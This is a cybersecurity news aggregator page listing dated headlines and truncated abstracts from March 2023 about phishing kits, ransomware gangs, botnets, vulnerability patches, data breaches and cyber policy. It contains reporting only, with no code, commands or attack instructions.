DEV-1101 Offers Phishing Kit for High-Volume AiTM Campaigns Full Text
Abstract
Microsoft Threat Intelligence stumbled across an open source adversary-in-the-middle (AiTM) phishing kit that furthers the ability of hackers to launch organized attacks and also scale them. The threat actor behind the kit is being tracked under the moniker DEV-1101. The kit's features include settin ... Read MoreCyware
March 14, 2023 – Breach
GoBruteforcer: New Golang-Based Malware Breaches Web Servers Via Brute-Force Attacks Full Text
Abstract
A new Golang-based malware dubbed GoBruteforcer has been found targeting web servers running phpMyAdmin, MySQL, FTP, and Postgres to corral the devices into a botnet. "GoBruteforcer chose a Classless Inter-Domain Routing (CIDR) block for scanning the network during the attack, and it targeted all IP addresses within that CIDR range," Palo Alto Networks Unit 42 researchers said. "The threat actor chose CIDR block scanning as a way to get access to a wide range of target hosts on different IPs within a network instead of using a single IP address as a target." The malware is mainly designed to single out Unix-like platforms running x86, x64 and ARM architectures, with GoBruteforcer attempting to obtain access via a brute-force attack using a list of credentials hard-coded into the binary. If the attack proves to be successful, an internet relay chat (IRC) bot is deployed on the victim server to establish communications with an actor-controlled server.The Hacker News
March 14, 2023 – Criminals
LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries Full Text
Abstract
The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production...Security Affairs
March 14, 2023 – Vulnerabilities
Siemens Addresses Over 90 Vulnerabilities for ICS Patch Tuesday Full Text
Abstract
Siemens has released only seven new advisories, but they describe a total of 92 vulnerabilities. However, a vast majority are introduced by the use of third-party components rather than being specific to Siemens products.Cyware
March 14, 2023 – Ransomware
The Prolificacy of LockBit Ransomware Full Text
Abstract
Today, the LockBit ransomware is the most active and successful cybercrime organization in the world. Attributed to a Russian threat actor, LockBit has stepped out from the shadows of the Conti ransomware group, who were disbanded in early 2022. LockBit ransomware was first discovered in September 2019 and was previously known as ABCD ransomware because of the ".abcd virus" extension first observed. LockBit operates as a Ransomware-as-a-Service (RaaS) model. In short, this means that affiliates make a deposit to use the tool, then split the ransom payment with the LockBit group. It has been reported that some affiliates are receiving a share as high as 75%. LockBit's operators have posted advertisements for their affiliate program on Russian-language criminal forums stating they will not operate in Russia or any CIS countries, nor will they work with English-speaking developers unless a Russian-speaking "guarantor" vouches for them. Initial attack vectors ofThe Hacker News
March 14, 2023 – Vulnerabilities
Microsoft Patch Tuesday fixes Outlook zero-day actively exploited Full Text
Abstract
Microsoft Patch Tuesday updates for March 2023 addressed 74 vulnerabilities, including a Windows zero-day exploited in ransomware attacks. Microsoft Patch Tuesday security updates for March 2023 addressed 74 new vulnerabilities in Microsoft Windows...Security Affairs
March 14, 2023 – Attack
Hospital in Brussels latest victim in spate of European healthcare cyberattacks Full Text
Abstract
Ambulances were diverted from the Centre Hospitalier Universitaire (CHU) Saint-Pierre this weekend following the attack in the early hours of Friday morning. Details about the attack and the perpetrators have not yet been disclosed.Cyware
March 14, 2023 – Phishing
Microsoft Warns of Large-Scale Use of Phishing Kits to Send Millions of Emails Daily Full Text
Abstract
An open source adversary-in-the-middle (AiTM) phishing kit has found a number of takers in the cybercrime world for its ability to orchestrate attacks at scale. Microsoft Threat Intelligence is tracking the threat actor behind the development of the kit under its emerging moniker DEV-1101. An AiTM phishing attack typically involves a threat actor attempting to steal and intercept a target's password and session cookies by deploying a proxy server between the user and the website. Such attacks are more effective owing to their ability to circumvent multi-factor authentication (MFA) protections. DEV-1101, per the tech giant, is said to be the party behind several phishing kits that can be purchased or rented by other criminal actors, thereby reducing the effort and resources required to launch a phishing campaign. "The availability of such phishing kits for purchase by attackers is part of the industrialization of the cybercriminal economy and lowers the barrier ofThe Hacker News
March 14, 2023 – Vulnerabilities
Adobe fixed ColdFusion flaw listed as under active exploit Full Text
Abstract
Adobe is warning that a critical zero-day flaw in the ColdFusion web app development platform was exploited in very limited attacks. Software giant Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve a critical flaw, tracked...Security Affairs
March 14, 2023 – Business
Grip Security Receives Investment from The Syndicate Group Full Text
Abstract
The Boston, MA, and Tel Aviv, Israel-based SaaS security company unifying discovery, access control, and data governance, received an investment from The Syndicate Group. The amount of the deal was not disclosed.Cyware
March 14, 2023 – Vulnerabilities
Fortinet FortiOS Flaw Exploited in Targeted Cyberattacks on Government Entities Full Text
Abstract
Government entities and large organizations have been targeted by an unknown threat actor exploiting a security flaw in Fortinet FortiOS software, resulting in data loss and OS and file corruption. "The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers Guillaume Lovet and Alex Kong said in an advisory last week. The zero-day flaw in question is CVE-2022-41328 (CVSS score: 6.5), a medium-severity path traversal bug in FortiOS that could lead to arbitrary code execution. "An improper limitation of a pathname to a restricted directory vulnerability ('path traversal') [CWE-22] in FortiOS may allow a privileged attacker to read and write arbitrary files via crafted CLI commands," the company noted. The shortcoming impacts FortiOS versions 6.0, 6.2, 6.4.0 through 6.4.11, 7.0.0 through 7.0.9, and 7.2.0 through 7.2.3. Fixes are available in versions 6.4.1The Hacker News
March 14, 2023 – Phishing
DEV-1101 AiTM phishing kit is fueling large-scale phishing campaigns Full Text
Abstract
Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem. Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime...Security Affairs
March 14, 2023 – Criminals
LockBit Claims it Stole SpaceX Schematics From Parts Supplier, Threatens to Leak Them Full Text
Abstract
Ransomware gang Lockbit has boasted it broke into Maximum Industries, which makes parts for SpaceX, and stole 3,000 proprietary schematics developed by Elon Musk's rocketeers.Cyware
March 14, 2023 – Attack
Advanced actor targets Fortinet FortiOS in attacks on govt entities Full Text
Abstract
An unknown threat actor is targeting government entities and large organizations by exploiting a security flaw in Fortinet FortiOS. Fortinet researchers are warning of an advanced threat actor that is targeting governmental or government-related entities. The...Security Affairs
March 14, 2023 – Malware
New Fake ChatGPT Chrome Extension Stealing Facebook Ad Accounts with Thousands of Installs Full Text
Abstract
A Chrome Extension offering quick access to fake ChatGPT functionality was found to be hijacking Facebook accounts and installing hidden account backdoors. Notably, the Facebook app “backdoor” gives the threat actors super-admin permissions.Cyware
March 14, 2023 – Criminals
Dissecting the malicious arsenal of the Makop ransomware gang Full Text
Abstract
Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary: Insights from a recent intrusion authored by Makop ransomware operators show persistence capability through dedicated .NET tools. Makop...Security Affairs
March 14, 2023 – General
Counting ICS Vulnerabilities: Examining Variations in Numbers Reported by Security Firms Full Text
Abstract
Reports published in the past couple of months by various industrial cybersecurity companies provide different numbers when it comes to the vulnerabilities discovered in industrial control system (ICS) products in 2022.Cyware
March 14, 2023 – Hacker
Pro-Russian Hackers Blackmail Ukrainian Developer of S.T.A.L.K.E.R. 2 Game Full Text
Abstract
GSC Game World says it has been enduring cyberattacks for ‘more than a year’ and that hackers demand Russia-friendly changes to the game or else they’ll leak tons of the game’s development materials.Cyware
March 13, 2023 – Malware
Golang-based GoBruteforcer Malware Targets Popular Web Services Full Text
Abstract
GoBruteforcer, a new Golang-based botnet, has been seen scanning and infecting well-known web servers including FTP and MySQL, and deploys an IRC bot to communicate. At the time of the attack, GoBruteforcer uses a Classless Inter-Domain Routing (CIDR) block for scanning the network. The best w ...Cyware
March 13, 2023 – Attack
Large-scale Cyber Attack Hijacks East Asian Websites for Adult Content Redirects Full Text
Abstract
A widespread malicious cyber operation has hijacked thousands of websites aimed at East Asian audiences to redirect visitors to adult-themed content since early September 2022. The ongoing campaign entails injecting malicious JavaScript code into the hacked websites, often connecting to the target web server using legitimate FTP credentials the threat actor previously obtained via an unknown method. "In many cases, these were highly secure auto-generated FTP credentials which the attacker was somehow able to acquire and leverage for website hijacking," Wiz said in a report published this month. The fact that the breached websites – owned by both small firms and multinational corporations – utilize different tech stacks and hosting service providers has made it difficult to trace a common attack vector, the cloud security company noted. That said, one of the common denominators between the websites is that a majority of them are either hosted in China or hosted inThe Hacker News
March 13, 2023 – Policy and Law
Building From the 2023 National Cybersecurity Strategy: Reshaping the Terrain of Cyberspace Full Text
Abstract
If executed well, the strategy will serve as a strong pivot into a better vision for U.S. policy in cyberspace; if not, much of its promise will lack punch.Lawfare
March 13, 2023 – Botnet
Golang-Based Botnet GoBruteforcer targets web servers Full Text
Abstract
A recently discovered Golang-based botnet, dubbed GoBruteforcer, is targeting web servers running FTP, MySQL, phpMyAdmin, and Postgres services. Researchers from Palo Alto Networks Unit 42 recently discovered a Golang-based botnet, tracked as GoBruteforcer,...Security Affairs
March 13, 2023 – Malware
Hackers Push BatLoader via Google Search Ads Full Text
Abstract
BATLOADER, the notorious malware loader, was seen exploiting Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. In their ads, attackers fake legitimate apps and services such as Adobe, Tableau, ChatGPT, Spotify, and Zoom. Other samples of BATLOADER display enhanced capabilit ...Cyware
March 13, 2023 – Malware
Fake ChatGPT Chrome Extension Hijacking Facebook Accounts for Malicious Advertising Full Text
Abstract
A fake ChatGPT-branded Chrome browser extension has been found to come with capabilities to hijack Facebook accounts and create rogue admin accounts, highlighting one of the different methods cyber criminals are using to distribute malware. "By hijacking high-profile Facebook business accounts, the threat actor creates an elite army of Facebook bots and a malicious paid media apparatus," Guardio Labs researcher Nati Tal said in a technical report. "This allows it to push Facebook paid ads at the expense of its victims in a self-propagating worm-like manner." The "Quick access to Chat GPT" extension, which is said to have attracted 2,000 installations per day since March 3, 2023, has since been pulled by Google from the Chrome Web Store as of March 9, 2023. The browser add-on is promoted through Facebook-sponsored posts, and while it offers the ability to connect to the ChatGPT service, it's also engineered to surreptitiously harvest cookies andThe Hacker News
March 13, 2023 – Government
CISA adds Plex Media Server bug, exploited in LastPass attack, to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added a remote code execution vulnerability in Plex Media Server to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a remote code execution (RCE) vulnerability in the Plex Media...Security Affairs
March 13, 2023 – Hacker
China-linked Hackers Abuse SonicWall SMA Devices Full Text
Abstract
UNC4540, a China-linked cybercriminal group, was observed deploying a custom backdoor on a SonicWall SMA appliance. Attackers show a thorough understanding of the appliance and use a set of malicious files to obtain privileges. The malware is capable of extracting credentials, achieving persistence ...Cyware
March 13, 2023 – Education
How to Apply NIST Principles to SaaS in 2023 Full Text
Abstract
The National Institute of Standards and Technology (NIST) is one of the standard-bearers in global cybersecurity. The U.S.-based institute's cybersecurity framework helps organizations of all sizes understand, manage, and reduce their cyber-risk levels and better protect their data. Its importance in the fight against cyberattacks can't be overstated. While NIST hasn't directly developed standards related to securing the SaaS ecosystem, they are instrumental in the way we approach SaaS security. NIST recently released its Guide to a Secure Enterprise Network Landscape. In it, they discuss the transformation from on-premise networks to multiple cloud servers. Access to these servers, and the accompanying SaaS apps, is through both secure and unsecured devices and locations across disparate geography. The move to the cloud has effectively obliterated the network perimeter. As a result, companies have increased their attack surface and are experiencing an escalation of attacks thatThe Hacker News
March 13, 2023 – APT
Dark Pink APT targets Govt entities in South Asia Full Text
Abstract
Researchers reported that Dark Pink APT employed a malware dubbed KamiKakaBot against Southeast Asian targets. In February 2023, EclecticIQ researchers spotted multiple KamiKakaBot malware samples that were employed by the Dark Pink APT group (aka...Security Affairs
March 13, 2023 – Attack
Estonian official says parliamentary elections were targeted by cyberattacks Full Text
Abstract
Gert Auväärt, head of the National Cyber Security Centre-Estonia (NCSC-EE), told The Record that his team had been in a “heightened awareness level for two weeks” during the campaign, and that attempts to enter the electoral system were unsuccessful.Cyware
March 13, 2023 – Malware
Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware Full Text
Abstract
Threat actors have been increasingly observed using AI-generated YouTube videos to spread a variety of stealer malware such as Raccoon, RedLine, and Vidar. "The videos lure users by pretending to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other products that are licensed products available only to paid users," CloudSEK researcher Pavan Karthick M said. Just as the ransomware landscape comprises core developers and affiliates who are in charge of identifying potential targets and actually carrying out the attacks, the information stealer ecosystem also consists of threat actors known as traffers who are recruited to spread the malware using different methods. One of the popular malware distribution channels is YouTube, with CloudSEK witnessing a 200-300% month-over-month increase in videos containing links to stealer malware in the description section. These links are often obfuscated uThe Hacker News
March 13, 2023 – General
The risk of pasting confidential company data into ChatGPT Full Text
Abstract
Experts warn that employees are providing sensitive corporate data to the popular artificial intelligence chatbot model ChatGPT. Researchers from Cyberhaven Labs analyzed the use of ChatGPT by 1.6 million workers at companies across industries. They...Security Affairs
March 13, 2023 – Breach
Zoll Medical Discloses Data Breach Impacting One Million Individuals Full Text
Abstract
Medical technology developer Zoll Medical is notifying roughly one million individuals that their personal information might have been compromised in a recent data breach.Cyware
March 13, 2023 – Vulnerabilities
Researchers Uncover Over a Dozen Security Flaws in Akuvox E11 Smart Intercom Full Text
Abstract
More than a dozen security flaws have been disclosed in E11, a smart intercom product made by Chinese company Akuvox. "The vulnerabilities could allow attackers to execute code remotely in order to activate and control the device's camera and microphone, steal video and images, or gain a network foothold," Claroty security researcher Vera Mens said in a technical write-up. Akuvox E11 is described by the company on its website as a "SIP [Session Initiation Protocol] video doorphone specially designed for villas, houses, and apartments." The product listing, however, has been taken down from the website, displaying an error message: "Page does not exist." A snapshot captured by Google shows that the page was live as recently as March 12, 2023, 05:59:51 GMT. The attacks can manifest either through remote code execution within the local area network (LAN) or remote activation of the E11's camera and microphone, allowing the adversary to cThe Hacker News
March 13, 2023 – General
The SVB demise is a fraudster’s paradise, so take precautions Full Text
Abstract
The frenzy around the SVB collapse presents a huge opportunity for cybercriminals, and it creates a cyber risk for thousands of SVB account holders, and their customers and suppliers.Cyware
March 13, 2023 – Attack
KamiKakaBot Malware Used in Latest Dark Pink APT Attacks on Southeast Asian Targets Full Text
Abstract
The Dark Pink advanced persistent threat (APT) actor has been linked to a fresh set of attacks targeting government and military entities in Southeast Asian countries with a malware called KamiKakaBot. Dark Pink, also called Saaiwc, was extensively profiled by Group-IB earlier this year, describing its use of custom tools such as TelePowerBot and KamiKakaBot to run arbitrary commands and exfiltrate sensitive information. The threat actor is suspected to be of Asia-Pacific origin and has been active since at least mid-2021, with an increased tempo observed in 2022. "The latest attacks, which took place in February 2023, were almost identical to previous attacks," Dutch cybersecurity company EclecticIQ disclosed in a new report published last week. "The main difference in the February campaign is that the malware's obfuscation routine has improved to better evade anti-malware measures." The attacks play out in the form of social engineering lures thatThe Hacker News
March 13, 2023 – General
The risk of pasting confidential company data into ChatGPT Full Text
Abstract
The use of ChatGPT is becoming a serious problem in the workplace; it can potentially cause the leak of sensitive and confidential data. Companies like JP Morgan and Verizon are blocking access to the chatbot over concerns about confidential data.Cyware
March 12, 2023 – Phishing
New Email Threats by Exotic Lily Full Text
Abstract
ReliaQuest has laid bare the detail of a phishing campaign by IAB Exotic Lily wherein its members pretend to be a potential business opportunity. The attackers follow a well-established procedure that typically commences with initiating an open conversation with the victim. ReliaQuest adv ...Cyware
March 12, 2023 – General
Security Affairs newsletter Round 410 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. PlugX...Security Affairs
March 12, 2023 – Hacker
8220 Gang Uses New ScrubCrypt Crypter to Evade Detection Full Text
Abstract
Chinese 8220 Gang deployed the new ScrubCrypt payload exploiting an Oracle Weblogic Server in a specific URI between January and February 2023, revealed security experts at Fortinet. The ScrubCrypt crypter allows a hacker to secure applications with a unique BAT packing technique. It was found to b ...Cyware
March 12, 2023 – Breach
Acronis states that only one customer’s account has been compromised. Much ado about nothing Full Text
Abstract
Acronis downplays the severity of the recent security breach explaining that only a single customer’s account was compromised. The CISO of Acronis downplayed a recent intrusion, revealing that only one customer was impacted. This week a threat...Security Affairs
March 12, 2023 – Vulnerabilities
Cisco fixed CVE-2023-20049 DoS flaw affecting enterprise routers Full Text
Abstract
Cisco fixed a high-severity DoS vulnerability (CVE-2023-20049) in IOS XR software that impacts several enterprise routers. Cisco has released security updates to address a high-severity DoS vulnerability, tracked as CVE-2023-20049 (CVSS score of 8.6),...Security Affairs
March 11, 2023 – Malware
BATLOADER Malware Uses Google Ads to Deliver Vidar Stealer and Ursnif Payloads Full Text
Abstract
The malware downloader known as BATLOADER has been observed abusing Google Ads to deliver secondary payloads like Vidar Stealer and Ursnif. According to cybersecurity company eSentire, malicious ads are used to spoof a wide range of legitimate apps and services such as Adobe, OpenAI's ChatGPT, Spotify, Tableau, and Zoom. BATLOADER, as the name suggests, is a loader that's responsible for distributing next-stage malware such as information stealers, banking malware, Cobalt Strike, and even ransomware. One of the key traits of the BATLOADER operations is the use of software impersonation tactics for malware delivery. This is achieved by setting up lookalike websites that host Windows installer files masquerading as legitimate apps to trigger the infection sequence when a user searching for the software clicks a rogue ad on the Google search results page. These MSI installer files, when launched, execute Python scripts that contain the BATLOADER payload to retrieve tThe Hacker News
March 11, 2023 – Malware
PlugX malware delivered by exploiting flaws in Chinese programs Full Text
Abstract
Researchers observed threat actors deploying PlugX malware by exploiting flaws in Chinese remote control programs Sunlogin and Awesun. Researchers at ASEC (AhnLab Security Emergency response Center) observed threat actors deploying the PlugX malware...Security Affairs
March 11, 2023 – Botnet
Prometei botnet evolves and infected +10,000 systems since November 2022 Full Text
Abstract
A new version of the Prometei botnet has infected more than 10,000 systems worldwide since November 2022, experts warn. Cisco Talos researchers reported that the Prometei botnet has infected more than 10,000 systems worldwide since November 2022....Security Affairs
March 11, 2023 – Botnet
GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers Full Text
Abstract
Go programming language is a newer language that’s becoming more popular with malware programmers. It has proven to be versatile enough to develop all kinds of malware, including ransomware, stealers or remote access trojans (RATs).Cyware
March 11, 2023 – Government
CISA adds VMware’s Cloud Foundation bug to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added an actively exploited vulnerability in VMware's Cloud Foundation to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in VMware's Cloud Foundation,...Security Affairs
March 11, 2023 – Vulnerabilities
Unpatched Akuvox Smart Intercom Vulnerabilities Can Be Exploited for Spying Full Text
Abstract
A smart intercom product made by Chinese company Akuvox is affected by more than a dozen vulnerabilities, including potentially serious flaws that can be exploited for spying.Cyware
March 10, 2023 – Hacker
IceFire Operators Introduce Linux Variant, Abuse IBM Flaw Full Text
Abstract
Media and entertainment sector organizations worldwide are under attack by the threat actor using the Linux version of the IceFire ransomware. SentinelLabs first made this observation and found that criminals abused a deserialization bug in IBM Aspera Faspex file sharing software, tracked as CVE-20 ...Cyware
March 10, 2023 – Botnet
New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide Full Text
Abstract
An updated version of a botnet malware called Prometei has infected more than 10,000 systems worldwide since November 2022. The infections are both geographically indiscriminate and opportunistic, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Prometei, first observed in 2016, is a modular botnet that features a large repertoire of components and several proliferation methods, some of which also include the exploitation of ProxyLogon Microsoft Exchange Server flaws. It's also notable for avoiding striking Russia, suggesting that the threat actors behind the operation are likely based in the country. The cross-platform botnet's motivations are financial, primarily leveraging its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei (called v3) improves upon its existing features to challenge forensic analysis and further burrow its access on victim machines, Cisco Talos said in a report shareThe Hacker News
March 10, 2023 – Government
Department of Defense Releases Cyber Workforce Strategy, 2023–2027 Full Text
Abstract
The Cyber Workforce Strategy outlines steps to assess and enhance human capital over the next five years.Lawfare
March 10, 2023 – Criminals
Law enforcement seized the website selling the NetWire RAT and arrested a Croatian man Full Text
Abstract
An international law enforcement operation seized the infrastructure associated with the NetWire RAT and resulted in the arrest of its administrator. A coordinated international law enforcement operation resulted in the seizure of the infrastructure...Security Affairs
March 10, 2023 – Breach
Vulnerability Revealed OpenSea NFT Market Users’ Identities Full Text
Abstract
The Imperva Red Team discovered a vulnerability affecting the world’s largest NFT marketplace, OpenSea. It is a cross-site search (XS-Search) vulnerability that can be exploited by an attacker to obtain a user’s identity.Cyware
March 10, 2023 – Hacker
China-linked Hackers Targeting Unpatched SonicWall SMA Devices with Malware Full Text
Abstract
A suspected China-linked hacking campaign has been observed targeting unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop malware and establish long-term persistence. "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. The Google-owned incident response and threat intelligence firm is tracking the activity under its uncategorized moniker UNC4540. The malware – a collection of bash scripts and a single ELF binary identified as a TinyShell backdoor – is engineered to grant the attacker privileged access to SonicWall devices. The overall objective behind the custom toolset appears to be credential theft, with the malware permitting the adversary to siphon cryptographically hashed credentials from all logged-in users. It further provides shell access to the compromised device. Mandiant also called out thThe Hacker News
March 10, 2023 – Malware
Latest version of Xenomorph Android malware targets 400 banks Full Text
Abstract
A new version of the Xenomorph Android malware includes a new automated transfer system framework and targets 400 banks. The author of the Xenomorph Android malware, the Hadoken Security Group, continues to improve their malicious code. In February...Security Affairs
March 10, 2023 – Government
White House Budget Seeks to Bolster US Tech Development, Modernize Standards Full Text
Abstract
The budget proposes $3.1 billion for the CISA. This includes “$98 million to implement the Cyber Incident Reporting for Critical Infrastructure Act,” as well as “$425 million to improve CISA’s internal cybersecurity and analytical capabilities.”Cyware
March 10, 2023 – Criminals
International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT Full Text
Abstract
A coordinated international law enforcement exercise has taken down the online infrastructure associated with a cross-platform remote access trojan (RAT) known as NetWire. Coinciding with the seizure of the sales website www.worldwiredlabs[.]com, a Croatian national who is suspected to be the website's administrator has been arrested. While the suspect's name was not released, investigative journalist Brian Krebs identified Mario Zanko as the owner of the domain. "NetWire is a licensed commodity RAT offered in underground forums to non-technical users to carry out their own criminal activities," Europol's European Cybercrime Center (EC3) said in a tweet. Advertised since at least 2012, the malware is typically distributed via malspam campaigns and gives a remote attacker complete control over a Windows, macOS, or Linux system. It also comes with password-stealing and keylogging capabilities. The U.S. Department of Justice (DoJ) said an investigaThe Hacker News
March 10, 2023 – Breach
AT&T is notifying millions of customers of data breach after a third-party vendor hack Full Text
Abstract
AT&T is warning some of its customers that some of their information was exposed after the hack of a third-party vendor's system. AT&T is notifying millions of customers that some of their information was exposed after a third-party vendor...Security Affairs
March 10, 2023 – Breach
BMW exposes data of clients in Italy, experts warn Full Text
Abstract
If a malicious hacker were to discover the flaw, they could exploit it to access customer data, steal the company’s source code, and look for other vulnerabilities to exploit.Cyware
March 10, 2023 – General
When Partial Protection is Zero Protection: The MFA Blind Spots No One Talks About Full Text
Abstract
Multi-factor Authentication (MFA) has long since become a standard security practice. With a wide consensus on its ability to fend off more than 99 percent of account takeover attacks, it's no wonder security architects regard it as a must-have in their environments. However, what seems to be less known are the inherent coverage limitations of traditional MFA solutions. While compatible with RDP connections and local desktop logins, they offer no protection for remote command line access tools like PsExec, Remote PowerShell and their likes. In practice, this means that workstations and servers remain vulnerable to lateral movement, ransomware spread and other identity threats despite having a fully functioning MFA solution in place. For the adversary it's just a matter of taking the command line path instead of RDP to log in as if there were no protection installed at all. In this article we'll explore this blind spot, understand its root cause and implications, and viewThe Hacker News
March 10, 2023 – Breach
BMW exposes data of clients in Italy, experts warn Full Text
Abstract
Cybernews researchers discovered that BMW exposed sensitive files that were generated by a framework that BMW Italy relies on. Original post at: https://cybernews.com/security/bmw-exposes-italy-clients/ Hackers have been enjoying their fair share...Security Affairs
March 10, 2023 – Business
Socure Secures $95 Million Credit Facility with J.P. Morgan, Silicon Valley Bank, and KeyBanc Capital Markets Full Text
Abstract
This line of credit will further strengthen the company's financial position as it continues on its mission to be the first and only solution provider to verify 100% of good identities in real-time and eliminate identity fraud on the internet.Cyware
March 10, 2023 – Malware
Xenomorph Android Banking Trojan Returns with a New and More Powerful Variant Full Text
Abstract
A new variant of the Android banking trojan named Xenomorph has surfaced in the wild, latest findings from ThreatFabric reveal. Named "Xenomorph 3rd generation" by the Hadoken Security Group, the threat actor behind the operation, the updated version comes with new features that allow it to perform financial fraud in a seamless manner. "This new version of the malware adds many new capabilities to an already feature-rich Android banker, most notably the introduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement a complete ATS framework," the Dutch security firm said in a report shared with The Hacker News. Xenomorph first came to light a year ago in February 2022, when it was found to target 56 European banks through dropper apps published on the Google Play Store. In contrast, the latest iteration of the banker – which has a dedicated website advertising its features – is designed to targeThe Hacker News
March 10, 2023 – Ransomware
Nevada Ransomware: Yet Another Nokayawa Variant Full Text
Abstract
Zscaler ThreatLabz has identified significant code similarities between Nevada and Nokoyawa ransomware, including debug strings, command-line arguments, and encryption algorithms.Cyware
March 10, 2023 – Hacker
North Korean UNC2970 Hackers Expand Operations with New Malware Families Full Text
Abstract
A North Korean espionage group tracked as UNC2970 has been observed employing previously undocumented malware families as part of a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. Google-owned Mandiant said the threat cluster shares "multiple overlaps" with a long-running operation dubbed "Dream Job" that employs job recruitment lures in email messages to trigger the infection sequence. UNC2970 is the new moniker designated by the threat intelligence firm to a set of North Korean cyber activity that maps to UNC577 (aka Temp.Hermit), and which also comprises another nascent threat cluster tracked as UNC4034. The UNC4034 activity, as documented by Mandiant in September 2022, entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. "UNC2970 has a concerted effort towards obfuscation and empThe Hacker News
March 10, 2023 – Phishing
AI is taking phishing attacks to a whole new level of sophistication Full Text
Abstract
About 92% of organizations have fallen victim to successful phishing attacks in the last 12 months, while 91% of organizations have admitted to experiencing email data loss, according to Egress.Cyware
March 9, 2023 – Malware
OneNote Used as New Distribution Channel for Qakbot Malware Full Text
Abstract
Researchers observed a notable spike in emails utilizing malicious OneNote attachments, especially to drop Qakbot or QBot. Operators have apparently reorganized their infrastructure to target specific regions and industries.Cyware
March 09, 2023 – Hacker
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware Full Text
Abstract
Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC), in a new analysis, said it marks the continued abuse of the flaws to deliver a variety of payloads on compromised systems. This includes the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The modular malware has been extensively put to use by threat actors based in China, with new features continuously added to help perform system control and information theft. In the attacks observed by ASEC, successful exploitation of the flaws is followed by the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. This executable is a legitimate HTTP Server Service from cybersecurity company ESET, which is used to load the DLL file by means of a techniqThe Hacker News
March 9, 2023 – Denial Of Service
Akamai mitigated a record-breaking DDoS attack that peaked 900Gbps Full Text
Abstract
Akamai has mitigated the largest DDoS (distributed denial of service) attack it has ever recorded against customers in the Asia-Pacific region, which peaked at 900.1 gigabits per second. Akamai reported that the attack took place on February 23, 2023, at 10:22 UTC. The attack...Security Affairs
March 9, 2023 – Malware
Beware! AI Generates a Truly Polymorphic Malware BlackMamba Full Text
Abstract
A BlackMamba proof-of-concept attack was demonstrated by researchers. The large language model (LLM) technology on which ChatGPT is built was used to generate the keylogger functionality on the fly, making the malware polymorphic. The malware was tested against a renowned EDR system and resulted in absolutely no ale...Cyware
March 09, 2023 – Ransomware
IceFire Ransomware Exploits IBM Aspera Faspex to Attack Linux-Powered Enterprise Networks Full Text
Abstract
A Windows-based ransomware strain known as IceFire has expanded its focus to target Linux enterprise networks belonging to several media and entertainment sector organizations across the world. The intrusions entail the exploitation of a recently disclosed deserialization vulnerability in IBM Aspera Faspex file-sharing software (CVE-2022-47986, CVSS score: 9.8), according to cybersecurity company SentinelOne. "This strategic shift is a significant move that aligns them with other ransomware groups that also target Linux systems," Alex Delamotte, senior threat researcher at SentinelOne, said in a report shared with The Hacker News. A majority of the attacks observed by SentinelOne have been directed against companies located in Turkey, Iran, Pakistan, and the U.A.E., countries that are not typically targeted by organized ransomware crews. IceFire was first detected in March 2022 by the MalwareHunterTeam, but it wasn't until August 2022 thaThe Hacker News
March 9, 2023 – Vulnerabilities
SonicWall SMA appliance infected by a custom malware allegedly developed by Chinese hackers Full Text
Abstract
Alleged China-linked threat actors infected unpatched SonicWall Secure Mobile Access (SMA) appliances with a custom backdoor. Mandiant researchers reported that alleged China-linked threat actors, tracked as UNC4540, deployed custom malware on a SonicWall...Security Affairs
March 9, 2023 – Hacker
Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers Full Text
Abstract
It’s not clear if this particular persona’s efforts resulted in any successful phishing attacks. The Twitter account, created in October 2022, remains active. An Instagram account associated with the name is unavailable.Cyware
March 09, 2023 – General
Does Your Help Desk Know Who’s Calling? Full Text
Abstract
Phishing, the theft of users' credentials or sensitive data using social engineering, has been a significant threat since the early days of the internet and continues to plague organizations today, accounting for more than 30% of all known breaches. And with the mass migration to remote working during the pandemic, hackers have ramped up their efforts to steal login credentials as they take advantage of the chaos and lack of in-person user verification. This has led to the revival of the old-school technique of vishing, which, like phishing online, involves using social engineering over the phone to steal sensitive information. Vishing attacks have been on the rise as a result, with 69% of companies experiencing them in 2021, up from 54% in 2020. These attacks often take the form of job or tech support scams and can be incredibly convincing. In August 2020, the FBI and CISA issued a warning regarding remote users being targeted by attackers spoofing organizatiThe Hacker News
March 9, 2023 – Ransomware
Recently discovered IceFire Ransomware now also targets Linux systems Full Text
Abstract
